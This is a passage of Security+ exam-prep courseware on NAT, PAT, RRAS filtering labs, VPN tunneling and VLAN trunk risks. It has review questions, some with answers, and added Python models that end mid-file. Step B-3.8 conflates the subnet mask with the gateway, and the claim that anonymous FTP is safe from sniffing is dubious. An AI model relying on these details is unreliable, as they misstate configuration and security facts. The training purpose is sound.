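The following Python block, an added example and not code from the manual, models the three mechanisms described in the Dynamic NAT and PAT sections and in the combined-use list above: a dynamic NAT pool that rejects connections once more hosts are active than there are public addresses (the 250-versus-500 case), a PAT table that maps the text's two hosts 192.168.0.2:1108 and 192.168.0.3:1108 to 206.245.160.1 on ports 61001 and 61002 and routes replies back by port, and a virtual-server table for the incoming-only static mapping a mail or Web server behind the PAT router needs. The pool addresses (203.0.113.x) and the virtual server's address are constructed; the rest follow the text's own example.

```python
"""
Added example (not from the manual): constructed models of a dynamic NAT
pool and a PAT table with a virtual-server table. Addresses reuse the text's
example (192.168.0.x, 206.245.160.1); pool addresses are constructed from the
RFC 5737 documentation range 203.0.113.0/24.
"""


class DynamicNat:
    """Pool-based one-to-one bindings, created on the fly and released on expiry."""

    def __init__(self, pool):
        self.free = list(pool)   # public addresses available for binding
        self.bindings = {}       # private ip -> public ip

    def connect(self, private_ip):
        """Bind a private host to a public address; None means 'reject, pool empty'."""
        if private_ip in self.bindings:
            return self.bindings[private_ip]
        if not self.free:
            return None
        public_ip = self.free.pop(0)
        self.bindings[private_ip] = public_ip
        return public_ip

    def release(self, private_ip):
        """Connection closed or timed out: the binding expires and the address
        goes back to the pool for reuse."""
        self.free.append(self.bindings.pop(private_ip))


class PatRouter:
    """Port Address Translation: one public IP, streams told apart by source port."""

    def __init__(self, public_ip, first_port=61001, last_port=65535):
        self.public_ip = public_ip
        self.next_port = first_port
        self.last_port = last_port
        self.outbound = {}          # (private ip, private port, proto) -> public port
        self.inbound = {}           # (public port, proto) -> (private ip, private port)
        self.virtual_servers = {}   # (public port, proto) -> (server ip, port), static

    def translate_outbound(self, private_ip, private_port, proto):
        """Return the (public ip, public port) an inside stream is rewritten to."""
        key = (private_ip, private_port, proto)
        if key not in self.outbound:
            if self.next_port > self.last_port:
                return None        # every port in the configured range is in use
            port = self.next_port
            self.next_port += 1
            self.outbound[key] = port
            self.inbound[(port, proto)] = (private_ip, private_port)
        return self.public_ip, self.outbound[key]

    def add_virtual_server(self, public_port, proto, server_ip, server_port):
        """Static, incoming-only mapping: one server per public port."""
        self.virtual_servers[(public_port, proto)] = (server_ip, server_port)

    def translate_inbound(self, public_port, proto):
        """Reverse-map a packet arriving at the public address, or None when there
        is neither a live PAT binding nor a virtual-server entry for that port."""
        if (public_port, proto) in self.inbound:
            return self.inbound[(public_port, proto)]
        return self.virtual_servers.get((public_port, proto))


def admit_clients(pool_size, client_count):
    """How many of client_count simultaneously active hosts a dynamic NAT pool of
    pool_size public addresses can serve (constructed addresses)."""
    nat = DynamicNat(f"203.0.113.{i}" for i in range(pool_size))
    admitted = 0
    for i in range(client_count):
        if nat.connect(f"192.168.{i // 256}.{i % 256}") is not None:
            admitted += 1
    return admitted


if __name__ == "__main__":
    pat = PatRouter("206.245.160.1")
    for host in ("192.168.0.2", "192.168.0.3"):
        print(host, "1108 ->", pat.translate_outbound(host, 1108, "tcp"))
    print("reply to 61002 goes to", pat.translate_inbound(61002, "tcp"))
    pat.add_virtual_server(25, "tcp", "192.168.0.25", 25)
    print("incoming SMTP goes to", pat.translate_inbound(25, "tcp"))
    print("250-address pool, 500 hosts:", admit_clients(250, 500), "admitted")
```

The PAT binding is keyed on the inside address and port together, which is exactly what lets two hosts both use source port 1108; an incoming packet for a port with no binding and no virtual-server entry is dropped (`None`), which is the "cannot reverse map" property the text describes.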

Do it!              B-1:    Discussing Network Address Translation
                     Questions and answers
                      1 What are the primary functions that NAT performs? (Choose all that apply.)
                        A    Provides a type of firewall by hiding internal IP addresses.
                        B    Enables a company to use more internal IP addresses. Because they’re used
                             internally only, there’s no possibility of conflict with IP addresses used by
                             other companies and organizations.
                        C    Allows a company to combine multiple ISDN connections into a single
                             Internet connection.
                        D    All of the above.

                      2 In what class is address range 10.0.0.0 – 10.255.255.255?
                        A    A
                        B    B
                        C    C
                        D    D

                      3 In what class is address range 192.168.0.0 – 192.168.255.255?
                        A    A
                        B    B
                        C    C
                        D    D

                      4 Which of the following protocols map private IP addresses to registered IP
                        addresses on a one-to-one basis?
                        A    Dynamic NAT
                        B    Static NAT
                        C    Firewall NAT
                        D    Dynamic PAT

                      5 Which of the following IP address ranges is reserved for private networks?
                        A    10.0.0.0 through 10.255.255.255
                        B    172.16.0.0 through 172.31.255.255
                        C    192.168.0.0 through 192.168.255.255
                        D    All of the above

Do it!                      B-2:   Configuring RRAS with NAT

Instructor note: For this activity, each student requires a partner. Each pair requires two
Windows Server 2003 servers, a Windows Server 2003 server CD, Internet access, and a
crossover cable. Important: Students should not connect the crossover cable until
instructed to do so.

                             Here’s how                         Here’s why
                              1 Log on as Administrator on       Windows Server 2003 Routing and Remote
                                Server-X                         Access (RRAS) includes a service that can
                                                                 perform network address translation (NAT). In
                                                                 this activity, you will configure the Windows
                                                                 Server 2003 RRAS server for NAT.

                                                                 For this activity, you will need a partner. Each
                                                                 “partnership” should have two Windows Server
                                                                 2003 servers (one with two NIC adapters
                                                                 installed), a Windows Server 2003 server CD,
                                                                 Internet access and a crossover cable.

                                                                 Note: The server with two NIC cards will be
                                                                 referred to as Server-X; the other as Server-Y.
                                                                 Substitute the correct server names for these
                                                                 names.

                             2 Click Start

                               Choose Control Panel and
                               right-click Network
                               Connections

                               Choose Open

                             3 Right-click the second network   This card is not connected to the classroom
                               interface                        network.

                               Choose Properties

                             4 Double-click Internet
                               Protocol (TCP/IP)

                             5 Verify that Obtain an IP         If it isn’t, select Obtain an IP address
                               address automatically is         automatically.
                               selected

                               Click OK

                               Click OK

                             6 Right-click the second network   In Network Connections.
                               interface

                               Choose Rename

                             7 Enter Internal as the name

                               Press Enter

                      8 Right-click the first network
                        interface

                        Rename this card as External

                      9 Click Start

                        Choose Administrative
                        Tools, Routing and Remote
                        Access

                     10 Right-click Server-X

                     11 Select Configure and Enable        To start the Routing and Remote Access Server
                        Routing and Remote                 Setup Wizard.
                        Access

                     12 Click Next                         At the Welcome screen.

                     13 Select Network address
                        translation (NAT)

                        Click Next

                     14 Verify that Use this public        The External card should be connected to the
                        interface to connect to the        classroom network and the Internal card should
                        Internet is selected               be disconnected for now.

                        Select the External interface in   If necessary.
                        the list of available interfaces

                     15 Click Next

                     16 Click Finish                       To start the Routing and Remote Access.

                     17 Expand Server-X                    If necessary (in Routing and Remote Access).

                     18 Expand IP Routing                  If necessary.

                     19 Select General

                     20 Right-click the Internal           Make sure that you only configure the Dedicated
                        interface                          interface.

                        Choose Properties

                     21 Activate the Configuration tab

                     22 Select Use the following IP        To set static IP addressing on the Internal
                        address                            interface.

                        Enter 10.10.10.1                   As the IP address.

                        Enter 255.0.0.0                    As the Subnet mask.
                                             Network security topologies      11–13

23 Click OK                        To save the changes.

24 Click OK                        To acknowledge the warning message.

25 Close and reopen Routing and    (To reopen the MMC console. Click Start, then
   Remote Access                   choose Administrative Tools, Routing and
                                   Remote Access.)

26 Select NAT/Basic Firewall       Under IP Routing.

27 Right-click Internal            If there are multiple instances of Internal, for
                                   this step it doesn’t matter which instance you
                                   choose.

   Choose Properties

28 Verify that Private interface
   connected to private
   network is selected

   Click OK

29 Right-click the External
   interface

   Choose Properties

30 Verify that Public interface
   connected to the Internet
   is selected

   Click OK

31 Close Routing and Remote
   Access
11–14 CompTIA Security+ Certification

                                 Configuring a private subnet
Explanation                      If your network is using DHCP, you need to set static IP addresses for the Internal
                                 interface on Server-X and the primary interface on Server-Y. By connecting these two
                                 interfaces with a crossover cable, you will create a private subnet. With the NAT server
                                 properly configured, you can begin to allow clients to access the Internet.

Do it!                           B-3:    Configuring the client for Internet access

Instructor note: Students will require a Windows Server 2003 server running RRAS with NAT, a second Windows Server 2003 server to act as a client, Internet access on Server-X, and a crossover cable. Assist students with connecting the crossover cable.

                                  Here’s how                                Here’s why
                                   1 On Server-Y, disconnect the cable      You’ll use NAT to configure a client for Internet
                                     to the classroom network               access.

                                   2 Connect a crossover cable from         Follow your instructor’s directions for
                                     Server-Y to Server-X                   connecting the cable.

                                   3 Log on to Server-Y as
                                     Administrator
                                   4 Click Start

                                      Choose Control Panel and
                                      right-click Network
                                      Connections

                                      Choose Open

                                   5 Right-click the network interface

                                      Choose Properties

                                   6 Double-click Internet
                                      Protocol (TCP/IP)

                                   7 Select Use the following IP            To set static IP addressing.
                                      address

                                      Enter 10.10.10.2                      As the IP address.

                                   8 Press Tab                              (Do not press Enter.) To set the Subnet mask.

                                      Enter 10.10.10.1                      (As the default gateway.) This is the Internal
                                                                            address for Server-X.

                                   9 Under Use the following                As the Preferred DNS server.
                                      DNS server addresses, enter
                                      the IP address of the training
                                      center’s DNS server

                                      Click OK

                                      Click OK

10 Open Internet Explorer               To access the Internet.

11 Navigate to your favorite Web site

12 Close Internet Explorer

                           Disabling specific ports
Explanation                In some cases, you might want to disable access to specific ports on the NAT server.
                           For example, some companies have had users abuse Internet access by using it for non-
                           job-related tasks, such as listening to online radio stations. This might seem harmless to
                           the average user, but it can be a nightmare for network engineers. Internet radio streams
                           consume a large amount of bandwidth, and the problem is much worse if users are
                           streaming video. Windows Server 2003 with RRAS can block specific ports, which allows
                           network engineers to manage Internet access.

Do it!                     B-4:    Filtering outgoing traffic

Instructor note: Students should have a Windows Server 2003 server running RRAS and NAT and a second Windows Server 2003 server to act as a client.

                            Here’s how                                 Here’s why

                             1 On Server-X, click Start                To configure NAT output filters and to block
                                                                       Internet access for all users that use NAT.

                                Choose Administrative
                                Tools, Routing and Remote
                                Access
                             2 Expand IP Routing                       If necessary.

                                Select General

                             3 Right-click the External
                               interface

                                Choose Properties                      To open the External Properties dialog box. The
                                                                       General tab is activated by default.

                             4 Click Outbound Filters…                 To open the Outbound Filters dialog box.

                                Click New…                             To open the Add IP Filter dialog box.

5 Enter the information shown       To block all Internet access to port 80.
  below




6 Click OK                          To return to the Outbound Filters dialog box.
                                    The settings you just entered instruct the router
                                    to block all Internet access using the HTTP
                                    protocol.

7 Verify that Transmit all
  packets except those that
  meet the criteria below is
  selected

  Click OK twice

8 On Server-Y, launch Internet      Internet Explorer will try to load the page. After
  Explorer and try to access your   a few minutes, you’ll receive the error message:
  favorite Web site                 “The page cannot be displayed”.

9 Close Internet Explorer

                    Controlling local FTP access
Explanation         FTP is a useful tool for transferring files across the Internet, but it has a major security
                    flaw: it sends usernames and passwords across the LAN in plain text. By using
                    Windows Server 2003 RRAS input and output filters, you can control FTP access
                    without blocking other services. In the following activity, you’ll block local FTP access
                    but allow Internet FTP access. The reason for doing this is that local FTP traffic is
                    susceptible to sniffing, while most Internet FTP sites use anonymous access, which is
                    not.

Do it!              B-5:     Blocking local FTP access
                     Here’s how                                  Here’s why
                      1 On Server-X, right-click the
                        Internal interface

                         Choose Properties

                      2 Click Inbound Filters…                   To open the Inbound Filters dialog box.

                         Click New…

                      3 Enter the information shown              To block local FTP traffic while still allowing
                        below                                    Internet FTP access.




                         Click OK                                To return to the Inbound Filters dialog box.

                      4 Verify that Receive all
                         packets except those that
                         meet the criteria below is
                         selected

                         Click OK

                      5 Click OK

 6 On Server-Y, click Start

   Choose Run

   Enter cmd

 7 At the command line, enter ftp   To connect to Server-X via ftp. You’ll be
   10.10.10.1                       notified that you are connected to Server-X, but
                                    the connection will time out, and you’ll receive
                                    the message: “Connection closed by remote
                                    host”.

 8 At the command line, enter the
   following commands:

   ftp                              Enter ftp, and when the ftp prompt is displayed,
   open ftp.microsoft.com           enter open ftp.microsoft.com.

                                    You’ll connect successfully and be prompted to
                                    log on.

 9 Press Ctrl+C,                    To exit the ftp site.
   then enter quit

10 On Server-X, right-click         To start the process of removing the NAT
   External interface               outbound filters.

   Choose Properties

11 Click Outbound Filters

12 Click Delete

   Click OK                         To close the Outbound Filters dialog box.

   Click OK                         To close the External Properties window.

13 Right-click Internal interface   To start the process of removing the NAT
                                    inbound filters.

   Choose Properties

14 Click Inbound Filters

15 Click Delete

   Click OK                         To close the Inbound Filters dialog box.

   Click OK                         To close the Internal Properties window.

                     16 Right-click Server-X

                        Choose Disable Routing and            To disable Routing and Remote Access.
                        Remote Access

                        Click Yes                             To confirm the change.

                     17 Remove the crossover cable from
                        Server-Y

                     18 Reconnect the network cable for
                        Server-Y to the classroom
                        network

                     19 On Server-Y, access the
                        properties of the network interface

                        Select Obtain an IP address
                        automatically

                        Select Obtain DNS server
                        address automatically

                     20 Click OK twice

                     21 Close all windows
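The outbound filter of B-4 and the inbound filter of B-5 are evaluated by the same rule: a list of match criteria plus the default action chosen in the filter dialog. The following Python model, added here and not part of the course or of Windows RRAS, applies that rule to constructed packets sent by Server-Y; the B-5 criteria (destination 10.0.0.0/255.0.0.0, TCP, port 21) and the Internet addresses are assumptions, since the screenshot is not reproduced on the page.

```python
"""Decision logic of the RRAS IP packet filters from activities B-4 and B-5
(added example for this page; not course material and not the RRAS API).

A filter list is a set of match criteria (the Add IP Filter dialog) plus the
default action chosen in the Inbound/Outbound Filters dialog. Addresses follow
the activities: Server-X Internal 10.10.10.1, Server-Y 10.10.10.2, private
mask 255.0.0.0. Internet addresses (203.0.113.0/24, a documentation range)
are constructed. The criteria of the B-5 filter, whose screenshot is not on
the page, are assumed to be: destination 10.0.0.0/255.0.0.0, TCP, port 21.
"""
from dataclasses import dataclass, field
from ipaddress import IPv4Address, IPv4Network
from typing import List, Optional

PRIVATE_SUBNET = IPv4Network("10.0.0.0/8")       # 10.10.10.x with mask 255.0.0.0


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str        # "TCP", "UDP", "ICMP"
    sport: int = 0
    dport: int = 0


@dataclass(frozen=True)
class FilterRule:
    """One row of a filter list; None (or port 0) means 'any', as in the dialog."""
    src_net: Optional[str] = None
    dst_net: Optional[str] = None
    proto: Optional[str] = None
    sport: Optional[int] = None
    dport: Optional[int] = None

    def matches(self, p: Packet) -> bool:
        if self.src_net and IPv4Address(p.src) not in IPv4Network(self.src_net):
            return False
        if self.dst_net and IPv4Address(p.dst) not in IPv4Network(self.dst_net):
            return False
        if self.proto and self.proto != p.proto:
            return False
        if self.sport and self.sport != p.sport:
            return False
        return not (self.dport and self.dport != p.dport)


@dataclass
class FilterList:
    """Inbound or outbound filter list of one RRAS interface."""
    rules: List[FilterRule] = field(default_factory=list)
    # True:  "Transmit/Receive all packets except those that meet the criteria below"
    # False: "Drop all packets except those that meet the criteria below"
    pass_by_default: bool = True

    def allows(self, p: Packet) -> bool:
        matched = any(r.matches(p) for r in self.rules)
        return not matched if self.pass_by_default else matched


# B-4: outbound filter on the External interface, TCP destination port 80.
EXTERNAL_OUTBOUND = FilterList(rules=[FilterRule(proto="TCP", dport=80)])

# B-5: inbound filter on the Internal interface (assumed criteria, see above).
INTERNAL_INBOUND = FilterList(
    rules=[FilterRule(dst_net="10.0.0.0/8", proto="TCP", dport=21)])


def server_y_can_reach(p: Packet) -> bool:
    """Fate of a packet Server-Y sends through Server-X.

    Client traffic first arrives on the Internal interface (inbound list); if
    it is bound for the Internet it then leaves via the External interface
    (outbound list). Traffic to Server-X itself never reaches External.
    """
    if not INTERNAL_INBOUND.allows(p):
        return False
    if IPv4Address(p.dst) in PRIVATE_SUBNET:
        return True                       # delivered locally on Server-X
    return EXTERNAL_OUTBOUND.allows(p)


def demo() -> dict:
    """Constructed packets covering the outcomes observed in B-4 and B-5."""
    y = "10.10.10.2"
    return {
        "http_to_internet": server_y_can_reach(Packet(y, "203.0.113.10", "TCP", 1025, 80)),
        "https_to_internet": server_y_can_reach(Packet(y, "203.0.113.10", "TCP", 1026, 443)),
        "dns_to_internet": server_y_can_reach(Packet(y, "203.0.113.53", "UDP", 1027, 53)),
        "ftp_to_server_x": server_y_can_reach(Packet(y, "10.10.10.1", "TCP", 1028, 21)),
        "ftp_to_internet": server_y_can_reach(Packet(y, "203.0.113.20", "TCP", 1029, 21)),
    }
```

Note that the port 80 filter only stops plain HTTP; the same model shows HTTPS and DNS still passing, which is why a bandwidth policy built on port filters needs the full list of ports the unwanted application uses.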


Topic C: Tunneling
              This topic covers the following CompTIA Security+ exam objective:

               #     Objective

               3.3   Understand the concepts behind the following kinds of Security Topologies
                      • Tunneling




              How tunneling works
Explanation   A technology that enables a network to securely send its data through an untrusted or
              shared network infrastructure, tunneling works by encrypting and encapsulating the
              secured traffic within packets carried by the second network. Virtual private networks
              are perhaps the best-known example of tunneling technology.
              Exhibit 11-3 provides an example of a site-to-site (or gateway-to-gateway) tunnel. In
              this depiction, an organization has two offices and each has an Internet connection. The
              two offices routinely need to share sensitive data between their LANs. Approaches such
              as e-mail encryption are usable, but do not provide the convenience or scalability that
              the organization desires. The ideal solution is a direct secure link between the two
              LANs that permits the offices to use the same servers.




              Exhibit 11-3: Tunneling across a shared infrastructure

              To solve the problem, a router with Internet Protocol Security (IPSec) encryption
              capabilities is deployed as a gateway on each LAN’s Internet connection. The routers
              are configured for a point-to-point VPN tunnel, which uses encryption to build a virtual
              connection between the two routers. When a router sees traffic on its LAN that is
              destined for the other office, it communicates over the Internet to the router on the other
              side instructing it to build the tunnel. The “tunnel” is actually an agreement between the
              two routers on how the data is encrypted.
              Once the two routers have negotiated a secure encrypted connection, traffic from the
              originating host is encrypted using the agreed-upon settings and sent to the peer router.
              The peer router decrypts the data and forwards it to the appropriate host on its LAN.
              The connection appears to be a tunnel, because the hosts on the two LANs are unaware
              that their data is being encrypted. The encryption and delivery of the data over the
              untrusted network happens transparently to the communicating hosts.
              Because of its low cost (VPN tunnels often use existing Internet connections) and its
              security, tunneling has become common, replacing wide area network (WAN) links
              such as frame relay connections. Tunneling is an option for most IP connectivity
              requirements.
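The gateway-to-gateway exchange described above, as an added example that is not part of the course: two gateways encapsulate traffic for each other’s LANs, the outer packet shows only the gateway addresses, and the peer verifies, decrypts and forwards the inner packet. The addresses, the shared key and the stand-in cipher (a SHA-256 keystream with an HMAC tag, in place of the IPsec transforms the routers would negotiate) are assumptions.

```python
"""Site-to-site tunnel model for Exhibit 11-3 (added example, not course code).

A gateway encrypts the whole inner packet, wraps it in an outer packet addressed
gateway-to-gateway, and the peer verifies, decrypts and forwards it to the
destination host. No IPsec here: the cipher is a stand-in (SHA-256 keystream
plus HMAC-SHA256 tag) for whatever transforms the routers agree on.
Addresses and the shared key are constructed.
"""
import hashlib
import hmac
import json
import os
from dataclasses import dataclass
from ipaddress import IPv4Address, IPv4Network
from typing import Dict, Optional, Tuple


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    payload: bytes


def pack(p: Packet) -> bytes:
    return json.dumps([p.src, p.dst, p.payload.hex()]).encode()

def unpack(raw: bytes) -> Packet:
    src, dst, hexpayload = json.loads(raw.decode())
    return Packet(src, dst, bytes.fromhex(hexpayload))

def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    out = b""
    for counter in range(length // 32 + 1):
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
    return out[:length]

def seal(key: bytes, plaintext: bytes) -> bytes:
    """nonce || ciphertext || tag: stand-in for an encrypted ESP payload."""
    nonce = os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    return nonce + ct + hmac.new(key, nonce + ct, hashlib.sha256).digest()

def open_sealed(key: bytes, blob: bytes) -> Optional[bytes]:
    """Plaintext, or None if the tag does not verify (modified in transit)."""
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, hashlib.sha256).digest()):
        return None
    return bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct))))


class Gateway:
    """Router with encryption capabilities on one LAN's Internet connection."""

    def __init__(self, public_ip: str, local_lan: str):
        self.public_ip = public_ip
        self.local_lan = IPv4Network(local_lan)
        self.tunnels: Dict[IPv4Network, Tuple[str, bytes]] = {}   # remote LAN -> (peer, key)

    def add_tunnel(self, remote_lan: str, peer_ip: str, key: bytes) -> None:
        """The two routers' agreement on how traffic for remote_lan is protected."""
        self.tunnels[IPv4Network(remote_lan)] = (peer_ip, key)

    def send(self, inner: Packet) -> Optional[Packet]:
        """LAN packet for a tunnelled LAN -> outer packet showing only gateway addresses."""
        for lan, (peer_ip, key) in self.tunnels.items():
            if IPv4Address(inner.dst) in lan:
                return Packet(self.public_ip, peer_ip, seal(key, pack(inner)))
        return None                                   # not for a tunnel: route normally

    def receive(self, outer: Packet) -> Optional[Packet]:
        """Outer packet from a peer -> inner packet to forward on the LAN, else None."""
        for lan, (peer_ip, key) in self.tunnels.items():
            if outer.src != peer_ip:
                continue
            raw = open_sealed(key, outer.payload)
            if raw is None:
                return None
            inner = unpack(raw)
            # Accept only what this tunnel is for: remote LAN -> our LAN.
            if IPv4Address(inner.src) in lan and IPv4Address(inner.dst) in self.local_lan:
                return inner
        return None


def demo() -> dict:
    """Two offices, one tunnel: a packet crosses it, a modified copy is rejected."""
    key = os.urandom(32)
    gw_a = Gateway("198.51.100.1", "192.168.1.0/24")
    gw_b = Gateway("203.0.113.1", "192.168.2.0/24")
    gw_a.add_tunnel("192.168.2.0/24", gw_b.public_ip, key)
    gw_b.add_tunnel("192.168.1.0/24", gw_a.public_ip, key)

    inner = Packet("192.168.1.10", "192.168.2.20", b"GET /report HTTP/1.1")
    outer = gw_a.send(inner)                 # what the shared network sees
    delivered = gw_b.receive(outer)          # what the host on LAN B gets
    flipped = outer.payload[:-1] + bytes([outer.payload[-1] ^ 0x01])
    tampered = gw_b.receive(Packet(outer.src, outer.dst, flipped))
    return {"outer": outer, "delivered": delivered, "tampered": tampered}
```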

Do it!                       C-1:   Reviewing VPN tunneling
                              Questions and answers

Instructor note: Make sure that students understand that L2TP and PPTP are tunneling protocols and, unless combined with an encryption protocol such as IPSec or MPPE, do not guarantee confidentiality.

                              1 Which of the following protocols are used to secure a VPN connection?

                                A    IPSec

                                B    L2TP

                                C    MPPE

                                D    PPTP

                              2 For each of the descriptions below, indicate whether the VPN is a remote access
                                or site-to-site topology.

                                Creates a secured connection between a remote client       Remote access
                                and an access point or the corporate network

                                Establishes a point-to-point connection                    Site-to-site

                                Requires an ISP to establish the tunnel                    Remote access

                                Uses tunnel mode encryption                                Site-to-site

                                Decrypts the entire IP packet before forwarding to the     Site-to-site
                                destination host


Topic D: Virtual Local Area Networks
              This topic covers the following CompTIA Security+ exam objective:

               #     Objective

               3.3   Understand the concepts behind the following kinds of Security Topologies
                      • VLANs (Virtual Local Area Network)




              VLANs
Explanation   Virtual local area networks (VLANs) are a way of dividing a single physical network
              switch among multiple network segments or broadcast domains. The ability to
              configure multiple VLANs on a single switch is a very powerful and useful technology
              that offers network flexibility, scalability, increased performance, and some security
              features. VLANs are often coupled with a complementary technology, called a trunk,
              which allows switches to share many VLANs over a single physical link. Because
              VLANs make it easy to segment a network into multiple subnets (which cannot
              communicate with each other directly), they increase the need for routers, which
              enable communication between subnets and add important security features, such as
              packet-filtering capabilities.
              Because of their benefits, VLANs (and by association, trunking) have become
              extremely widespread. Most enterprise-grade network switches come standard with the
              ability to define VLANs. However, VLANs do suffer from a number of vulnerabilities,
              which can be mitigated by following best practices in network design.

              How it works
              As an example of how VLANs work, we’ll use a Cisco Catalyst 6509 switch belonging
              to a business with five departments and 220 employees. This type of switch is an
              enterprise-class switch that can support a line card with 48 Ethernet ports in up to eight
              of its nine slots. That’s a total of 384 Ethernet ports on a single switch!
              By configuring several VLANs on the switch, and assigning each port to an appropriate
              VLAN, the single physical switch is broken up into multiple logical switches. The
              business in our example can configure a separate VLAN for each department. It doesn’t
              matter to which port a given user’s computer is connected because the switch can be
              configured to place the port into any VLAN.

                    Exhibit 11-4 illustrates a hypothetical switch configuration in which some ports on line
                    card 2 are configured for VLAN 2 and others are configured for VLAN 1. VLAN 1
                    includes noncontiguous ports on two different line cards. The configuration is up to the
                    system administrator; any port can be configured for any VLAN, regardless of its
                    physical location on the switch. Each VLAN behaves in many senses like a different
                    switch: hosts on VLAN 1 cannot communicate with hosts on VLAN 2 unless a router is
                    connected to both subnets to forward traffic between them. However, the switch’s
                    configuration determines what VLANs exist and to which VLAN each port is assigned.
                    Trunking adds even more power to VLANs by allowing switches to forward data from
                    multiple VLANs over a single physical link. In Exhibit 11-5, you see an example in
                    which switch A provides connectivity to users on the fourth, fifth, and sixth floors of an
                    office building. Switch B provides network connectivity to users on the fourth floor.
                    The switch for each floor is in turn connected by a single Ethernet connection to a
                    central switch, switch E.




                    Exhibit 11-4: Physical VLAN configuration on Cisco Catalyst 6509

                    Because the connection between each switch is a trunk, packets from any VLAN can
                    pass across it. (The normal VLAN boundaries apply, however. Hosts on different
                    VLANs cannot communicate with each other over trunks.) This enables hosts connected
                    to VLAN 20 on the fourth floor to communicate with hosts on the sixth floor who are
                    also connected to VLAN 20. Without trunking, a separate physical connection for each
                    VLAN would have to be established between each switch and switch E. The switch’s
                    built-in intelligence watches packets arriving on a trunk port, automatically determines
                    to which VLAN each packet belongs, and forwards it to the appropriate port. The result is
                    that the network administrator can place any host in the building on any of the
                    network’s subnets, on the fly, without any physical recabling.
                    Major trunking protocols include IEEE 802.1q and Cisco’s proprietary Inter-Switch
                    Link (ISL).




Exhibit 11-5: Assigning ports to different VLANs

                    Security features of VLANs
                    VLANs have a number of security features, many of which derive from the fact that
                    they permit the administrator to divide a single physical device into multiple subnets,
                    which is to say that VLANs allow networks to be segmented, dividing up hosts and their
                    traffic.
                    VLANs can be configured to group together users in the same group or team, regardless
                    of where their computers are physically connected to the network. The users can be
                    spread throughout a building or across a campus network. Any criteria can be used to
                    divide users up, depending on business requirements. For example, accountants working
                    with sensitive financial data might be segmented on a separate VLAN from other users
                    in order to ensure that the accounting information stays confidential. Because they are
                    on different subnets, hosts in the Accounting Department VLAN cannot communicate
                    directly with other hosts; they can only do so with the help of a router. This protects the
                    Accounting Department from many attacks that rely on direct communication between
                    hosts, such as man-in-the-middle, because accounting’s broadcasts cannot be seen by
                    other departments’ users. Further, because traffic filtering can be configured on the
                    router connecting VLANs to the corporate network, the network administrator is able to
                    enforce security policies by stopping prohibited communications between department
                    VLANs.
                    Another useful aspect of VLANs pertains to physically inserting attacking devices, such
                    as a sniffer, into the network. If an unauthorized person gains access to the network
                    closet and attempts to connect a sniffer to the network, VLANs could offer some
                    protection. In this situation, the attacker wouldn’t know in advance to which VLAN he
                    was connecting (unless he had previous knowledge of the network) because any port
                    could be configured to be in any VLAN. Depending on the attacker’s objectives (such
                    as sniffing traffic belonging to the Accounting Department), this could foil the attack.
                    Further, adhering to the best practices outlined here increases the difficulty of
                    connecting rogue devices to the network.
                    Protect unused switch ports. Most configurable switches support the ability to turn off
                    ports. Network administrators should be sure to turn off all switch ports that are not in
                    use so that they cannot be used by an attacker to connect an unauthorized device to the
                    network. Administrators can protect their networks from accidentally leaving an unused
                    port on by moving all unused ports to a separate VLAN without any user traffic and
                    without any router connections. That way, if an attacker does find an active port to use,
                    there is no traffic to sniff and no router to permit him to reach other network segments.
                    Use an air gap to separate trusted from untrusted networks. Do not allow the same
                    switch or network of switches to provide connectivity to networks segregated by
                    security devices such as firewalls. A switch that has direct connections to untrusted
                    networks such as the Internet, or semi-trusted networks such as DMZs, should never be
                    used to contain trusted network segments as well. Several attacks can affect the
                    configuration of the switch so that it does not properly segment VLANs.

                    Vulnerabilities of VLAN trunks
                    A number of vulnerabilities are associated with VLAN trunks. This is inherent in their
                    function of carrying traffic from multiple subnets across a single physical connection.
                    One could imagine that if it is desirable to prevent hosts in two different departments
                    (say, Accounting and Marketing) from communicating with each other, that there might
                    be issues with mixing their traffic over a trunk.

Trunk auto-negotiation
One way that trunks can be abused stems from the fact that the default behavior of some
manufacturers’ switches is to automatically negotiate a trunk connection if the
connecting device initiates it.
Hackers can exploit this behavior by compromising a host on the network and then
causing that host to negotiate a trunk connection with the switch. Once the trunk
connection has been established, the switch forwards traffic for all VLANs across the
link, giving the attacker access to potentially the entire network. Recall our example in
which the Accounting and Marketing Departments are placed on separate VLANs and
are connected with a router that filters traffic between the two. The attacker could use a
host in the Marketing Department to create a trunk with the switch. As the switch begins
to forward traffic down the illicit trunk link, the attacker can view and possibly modify
traffic from Marketing, Accounting, or any other department using the switch. The
protection provided by packet filtering on the router has been completely avoided
because the trunk traffic does not pass through the router.
Prevent illicit trunk connections by disabling auto-negotiation on all ports. Ports that are
to carry trunks should be configured as trunks. All other ports should be configured not
to be trunks.

Trunk VLAN membership and pruning
By default, trunk links are permitted to carry traffic from all VLANs on the network.
This can lead to performance degradation of switches from carrying large amounts of
traffic across trunks. In some cases, this traffic might not even be needed, as would be
the case if a switch received traffic for the Accounting VLAN over a trunk but did not
have any ports configured for that VLAN. This situation can be relieved by pruning
(that is, removing) unneeded VLANs from the trunk. By removing the Accounting
VLAN from the trunk, more bandwidth is made available to users connected to the
switch. Some switches simplify this process by automatically pruning VLANs from a
trunk if there are not any VLAN member ports on the other side of the trunk link.
Relying on this default behavior to ensure that sensitive information is not carried to
undesired areas of the network can be dangerous, however. For example, take a switch
in a company’s mechanic shop that is only used for the shop employees and has a trunk
connection back to the office network. By default, only traffic destined for the auto shop
is forwarded across the trunk, because there are no ports on the shop’s switch that are
configured for other VLANs. However, the Accounting Department’s information is
still at risk. If an attacker could configure a port on the shop’s switch to be in the
Accounting VLAN, then the Accounting VLAN would no longer be pruned from the
trunk, and Accounting traffic would automatically be forwarded across the trunk to the
mechanic shop. An attacker could take advantage of a poorly monitored area to
physically compromise the network.
In order to prevent such attacks, it is recommended that all trunk links be manually
configured with the VLANs that are permitted to traverse them. Manual trunk pruning
cannot be overridden the same way that automatic pruning is preempted.
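To make the two trunk risks above concrete, here is an added Python model (not vendor code, and not tied to any switch CLI) of trunk auto-negotiation and of automatic versus manual pruning, with constructed switch names, port modes and VLAN numbers; it shows what each recommended configuration changes.

```python
"""Switch model for the trunk problems in Topic D: auto-negotiated trunks and
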